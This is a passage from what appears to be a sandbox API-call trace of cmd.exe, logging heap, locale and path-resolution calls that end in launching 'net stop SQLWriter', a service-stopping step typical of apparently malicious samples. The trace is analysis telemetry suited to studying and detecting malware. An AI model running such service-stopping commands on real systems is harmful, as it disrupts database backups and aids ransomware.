_String2="RANDOM") returned -7 [0068.961] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0068.961] GetProcessHeap () returned 0x3b0000 [0068.961] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x54) returned 0x3c5698 [0068.961] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x37f530 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0068.961] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x37f530, lpFilePart=0x37f52c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x37f52c*="Desktop") returned 0x25 [0068.961] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0068.962] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x37f2ac | out: lpFindFileData=0x37f2ac*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x3c1eb0 [0068.962] FindClose (in: hFindFile=0x3c1eb0 | out: hFindFile=0x3c1eb0) returned 1 [0068.962] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x37f2ac | out: lpFindFileData=0x37f2ac*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x963e2b90, ftLastAccessTime.dwHighDateTime=0x1d57b18, ftLastWriteTime.dwLowDateTime=0x963e2b90, ftLastWriteTime.dwHighDateTime=0x1d57b18, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x3c1eb0 [0068.962] FindClose (in: hFindFile=0x3c1eb0 | out: hFindFile=0x3c1eb0) returned 1 [0068.962] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0068.962] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x37f2ac | out: lpFindFileData=0x37f2ac*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x7e416480, ftLastAccessTime.dwHighDateTime=0x1d57b18, ftLastWriteTime.dwLowDateTime=0x7e416480, ftLastWriteTime.dwHighDateTime=0x1d57b18, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x3c1eb0 [0068.962] FindClose (in: hFindFile=0x3c1eb0 | out: hFindFile=0x3c1eb0) returned 1 [0068.962] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0068.962] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0068.962] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0068.962] GetProcessHeap () returned 0x3b0000 [0068.962] HeapFree (in: hHeap=0x3b0000, dwFlags=0x0, lpMem=0x3c4ba8 | out: hHeap=0x3b0000) returned 1 [0068.962] GetEnvironmentStringsW () returned 0x3c40b8* [0068.962] GetProcessHeap () returned 0x3b0000 [0068.963] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0xb36) returned 0x3c5ef8 [0068.963] FreeEnvironmentStringsW (penv=0x3c40b8) returned 1 [0068.963] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49f05260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0068.963] GetProcessHeap () returned 0x3b0000 [0068.963] HeapFree (in: hHeap=0x3b0000, dwFlags=0x0, lpMem=0x3c5698 | out: hHeap=0x3b0000) returned 1 [0068.963] GetProcessHeap () returned 0x3b0000 [0068.963] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x400e) returned 0x3c6a38 [0069.476] GetProcessHeap () returned 0x3b0000 [0069.476] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x32) returned 0x3c1eb0 [0069.476] GetProcessHeap () returned 0x3b0000 [0069.476] HeapFree (in: hHeap=0x3b0000, dwFlags=0x0, lpMem=0x3c6a38 | out: hHeap=0x3b0000) returned 1 [0069.476] GetConsoleOutputCP () returned 0x1b5 [0069.476] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f04260 | out: lpCPInfo=0x49f04260) returned 1 [0069.476] GetUserDefaultLCID () returned 0x409 [0069.477] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49f04950, cchData=8 | out: lpLCData=":") returned 2 [0069.477] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x37f670, cchData=128 | out: lpLCData="0") returned 2 [0069.477] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x37f670, cchData=128 | out: lpLCData="0") returned 2 [0069.477] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x37f670, cchData=128 | out: lpLCData="1") returned 2 [0069.477] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49f04940, cchData=8 | out: lpLCData="/") returned 2 [0069.477] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49f04d80, cchData=32 | out: lpLCData="Mon") returned 4 [0069.477] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49f04d40, cchData=32 | out: lpLCData="Tue") returned 4 [0069.477] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49f04d00, cchData=32 | out: lpLCData="Wed") returned 4 [0069.477] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49f04cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0069.477] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49f04c80, cchData=32 | out: lpLCData="Fri") returned 4 [0069.477] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49f04c40, cchData=32 | out: lpLCData="Sat") returned 4 [0069.477] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49f04c00, cchData=32 | out: lpLCData="Sun") returned 4 [0069.478] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49f04930, cchData=8 | out: lpLCData=".") returned 2 [0069.478] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49f04920, cchData=8 | out: lpLCData=",") returned 2 [0069.478] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0069.479] GetProcessHeap () returned 0x3b0000 [0069.479] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x0, Size=0x20c) returned 0x3c2dc0 [0069.479] GetConsoleTitleW (in: lpConsoleTitle=0x3c2dc0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0069.479] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0069.479] GetProcAddress (hModule=0x76c20000, lpProcName="CopyFileExW") returned 0x76c53b92 [0069.479] GetProcAddress (hModule=0x76c20000, lpProcName="IsDebuggerPresent") returned 0x76c34a5d [0069.479] GetProcAddress (hModule=0x76c20000, lpProcName="SetConsoleInputExeNameW") returned 0x76c4a79d [0069.480] GetProcessHeap () returned 0x3b0000 [0069.480] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x400a) returned 0x3c6a38 [0069.480] GetProcessHeap () returned 0x3b0000 [0069.480] HeapFree (in: hHeap=0x3b0000, dwFlags=0x0, lpMem=0x3c6a38 | out: hHeap=0x3b0000) returned 1 [0069.480] _wcsicmp (_String1="net", _String2=")") returned 69 [0069.480] _wcsicmp (_String1="FOR", _String2="net") returned -8 [0069.480] _wcsicmp (_String1="FOR/?", _String2="net") returned -8 [0069.480] _wcsicmp (_String1="IF", _String2="net") returned -5 [0069.480] _wcsicmp (_String1="IF/?", _String2="net") returned -5 [0069.480] _wcsicmp (_String1="REM", _String2="net") returned 4 [0069.480] _wcsicmp (_String1="REM/?", _String2="net") returned 4 [0069.480] GetProcessHeap () returned 0x3b0000 [0069.480] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x58) returned 0x3c2fd8 [0069.480] GetProcessHeap () returned 0x3b0000 [0069.480] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x10) returned 0x3bff00 [0069.480] GetProcessHeap () returned 0x3b0000 [0069.480] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x28) returned 0x3c3038 [0069.481] GetConsoleTitleW (in: lpConsoleTitle=0x37f368, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0069.481] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0069.481] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0069.481] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0069.481] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0069.482] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0069.482] _wcsicmp (_String1="net", _String2="CD") returned 11 [0069.482] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0069.482] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0069.482] _wcsicmp (_String1="net", _String2="REN") returned -4 [0069.482] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0069.482] _wcsicmp (_String1="net", _String2="SET") returned -5 [0069.482] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0069.482] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0069.482] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0069.482] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0069.482] _wcsicmp (_String1="net", _String2="MD") returned 1 [0069.482] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0069.482] _wcsicmp (_String1="net", _String2="RD") returned -4 [0069.482] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0069.482] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0069.482] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0069.482] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0069.482] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0069.482] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0069.482] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0069.482] _wcsicmp (_String1="net", _String2="VER") returned -8 [0069.482] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0069.482] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0069.482] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0069.482] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0069.482] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0069.482] _wcsicmp (_String1="net", _String2="START") returned -5 [0069.482] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0069.482] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0069.482] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0069.482] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0069.482] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0069.482] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0069.482] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0069.482] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0069.483] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0069.483] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0069.483] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0069.483] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0069.483] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0069.483] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0069.483] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0069.483] _wcsicmp (_String1="net", _String2="CD") returned 11 [0069.483] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0069.483] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0069.483] _wcsicmp (_String1="net", _String2="REN") returned -4 [0069.483] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0069.483] _wcsicmp (_String1="net", _String2="SET") returned -5 [0069.483] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0069.483] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0069.483] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0069.483] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0069.483] _wcsicmp (_String1="net", _String2="MD") returned 1 [0069.483] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0069.483] _wcsicmp (_String1="net", _String2="RD") returned -4 [0069.483] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0069.483] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0069.483] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0069.483] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0069.483] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0069.483] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0069.483] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0069.483] _wcsicmp (_String1="net", _String2="VER") returned -8 [0069.483] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0069.483] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0069.483] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0069.483] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0069.483] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0069.483] _wcsicmp (_String1="net", _String2="START") returned -5 [0069.484] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0069.484] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0069.484] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0069.484] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0069.484] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0069.484] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0069.484] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0069.484] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0069.484] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0069.484] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0069.484] _wcsicmp (_String1="net", _String2="FOR") returned 8 [0069.484] _wcsicmp (_String1="net", _String2="IF") returned 5 [0069.484] _wcsicmp (_String1="net", _String2="REM") returned -4 [0069.484] GetProcessHeap () returned 0x3b0000 [0069.484] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x210) returned 0x3c3068 [0069.484] GetProcessHeap () returned 0x3b0000 [0069.484] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x30) returned 0x3c3280 [0069.484] _wcsnicmp (_String1="net", _String2="cmd ", _MaxCount=0x4) returned 11 [0069.484] GetProcessHeap () returned 0x3b0000 [0069.484] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x418) returned 0x3b07f0 [0069.484] SetErrorMode (uMode=0x0) returned 0x0 [0069.484] SetErrorMode (uMode=0x1) returned 0x0 [0069.484] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3b07f8, lpFilePart=0x37ee88 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x37ee88*="Desktop") returned 0x25 [0069.485] SetErrorMode (uMode=0x0) returned 0x1 [0069.485] GetProcessHeap () returned 0x3b0000 [0069.485] RtlReAllocateHeap (Heap=0x3b0000, Flags=0x0, Ptr=0x3b07f0, Size=0x5c) returned 0x3b07f0 [0069.485] GetProcessHeap () returned 0x3b0000 [0069.485] RtlSizeHeap (HeapHandle=0x3b0000, Flags=0x0, MemoryPointer=0x3b07f0) returned 0x5c [0069.485] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0069.485] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0069.485] GetProcessHeap () returned 0x3b0000 [0069.485] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x120) returned 0x3c32b8 [0069.485] GetProcessHeap () returned 0x3b0000 [0069.485] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x238) returned 0x3b0858 [0069.491] GetProcessHeap () returned 0x3b0000 [0069.491] RtlReAllocateHeap (Heap=0x3b0000, Flags=0x0, Ptr=0x3b0858, Size=0x122) returned 0x3b0858 [0069.491] GetProcessHeap () returned 0x3b0000 [0069.491] RtlSizeHeap (HeapHandle=0x3b0000, Flags=0x0, MemoryPointer=0x3b0858) returned 0x122 [0069.491] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0069.491] GetProcessHeap () returned 0x3b0000 [0069.491] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0xe0) returned 0x3c33e0 [0069.492] GetProcessHeap () returned 0x3b0000 [0069.492] RtlReAllocateHeap (Heap=0x3b0000, Flags=0x0, Ptr=0x3c33e0, Size=0x76) returned 0x3c33e0 [0069.492] GetProcessHeap () returned 0x3b0000 [0069.492] RtlSizeHeap (HeapHandle=0x3b0000, Flags=0x0, MemoryPointer=0x3c33e0) returned 0x76 [0069.492] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0069.493] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x37ec04, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x37ec04) returned 0xffffffff [0069.493] GetLastError () returned 0x2 [0069.493] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x37ec04, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x37ec04) returned 0xffffffff [0069.493] GetLastError () returned 0x2 [0069.493] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0069.493] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x37ec04, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x37ec04) returned 0x3c3460 [0069.493] GetProcessHeap () returned 0x3b0000 [0069.493] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x0, Size=0x14) returned 0x3c34a0 [0069.493] FindClose (in: hFindFile=0x3c3460 | out: hFindFile=0x3c3460) returned 1 [0069.493] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x37ec04, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x37ec04) returned 0xffffffff [0069.493] GetLastError () returned 0x2 [0069.493] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x37ec04, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x37ec04) returned 0x3c3460 [0069.494] GetProcessHeap () returned 0x3b0000 [0069.494] RtlReAllocateHeap (Heap=0x3b0000, Flags=0x0, Ptr=0x3c34a0, Size=0x4) returned 0x3c34a0 [0069.494] FindClose (in: hFindFile=0x3c3460 | out: hFindFile=0x3c3460) returned 1 [0069.494] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0069.494] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0069.494] GetConsoleTitleW (in: lpConsoleTitle=0x37f0fc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0069.494] InitializeProcThreadAttributeList (in: lpAttributeList=0x37ef84, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x37f04c | out: lpAttributeList=0x37ef84, lpSize=0x37f04c) returned 1 [0069.494] UpdateProcThreadAttribute (in: lpAttributeList=0x37ef84, dwFlags=0x0, Attribute=0x60001, lpValue=0x37f044, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x37ef84, lpPreviousValue=0x0) returned 1 [0069.494] GetStartupInfoW (in: lpStartupInfo=0x37ef40 | out: lpStartupInfo=0x37ef40*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0069.494] GetProcessHeap () returned 0x3b0000 [0069.494] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x18) returned 0x3c3460 [0069.494] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0069.494] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0069.494] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0069.494] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0069.494] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0069.494] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0069.494] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0069.494] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0069.494] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0069.494] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0069.494] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0069.494] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0069.494] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0069.494] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0069.495] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0069.495] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0069.495] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0069.495] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0069.495] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0069.495] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0069.495] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0069.495] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0069.495] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0069.495] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0069.495] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0069.495] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0069.495] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0069.495] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0069.495] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0069.495] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0069.495] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0069.495] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0069.495] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0069.495] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0069.495] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0069.495] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0069.495] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0069.495] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0069.495] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0069.495] GetProcessHeap () returned 0x3b0000 [0069.495] HeapFree (in: hHeap=0x3b0000, dwFlags=0x0, lpMem=0x3c3460 | out: hHeap=0x3b0000) returned 1 [0069.495] GetProcessHeap () returned 0x3b0000 [0069.495] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0xa) returned 0x3bff18 [0069.495] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0069.497] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop SQLWriter", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x37efe0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop SQLWriter", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x37f02c | out: lpCommandLine="net stop SQLWriter", lpProcessInformation=0x37f02c*(hProcess=0x78, hThread=0x74, dwProcessId=0x998, dwThreadId=0xa08)) returned 1 [0070.050] CloseHandle (hObject=0x74) returned 1 [0070.050] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0070.050] GetProcessHeap () returned 0x3b0000 [0070.050] HeapFree (in: hHeap=0x3b0000, dwFlags=0x0, lpMem=0x3c5ef8 | out: hHeap=0x3b0000) returned 1 [0070.050] GetEnvironmentStringsW () returned 0x3c5ef8* [0070.050] GetProcessHeap () returned 0x3b0000 [0070.050] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0xb36) returned 0x3c40b8 [0070.050] FreeEnvironmentStringsW (penv=0x3c5ef8) returned 1 [0070.050] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0072.391] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x37ef20 | out: lpExitCode=0x37ef20*=0x2) returned 1 [0072.392] CloseHandle (hObject=0x78) returned 1 [0072.392] _vsnwprintf (in: _Buffer=0x37f068, _BufferCount=0x13, _Format="%08X", _ArgList=0x37ef2c | out: _Buffer="00000002") returned 8 [0072.392] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0072.392] GetProcessHeap () returned 0x3b0000 [0072.392] HeapFree (in: hHeap=0x3b0000, dwFlags=0x0, lpMem=0x3c40b8 | out: hHeap=0x3b0000) returned 1 [0072.392] GetEnvironmentStringsW () returned 0x3c40b8* [0072.392] GetProcessHeap () returned 0x3b0000 [0072.392] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0xb5c) returned 0x3c95a0 [0072.392] FreeEnvironmentStringsW (penv=0x3c40b8) returned 1 [0072.392] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0072.392] GetProcessHeap () returned 0x3b0000 [0072.392] HeapFree 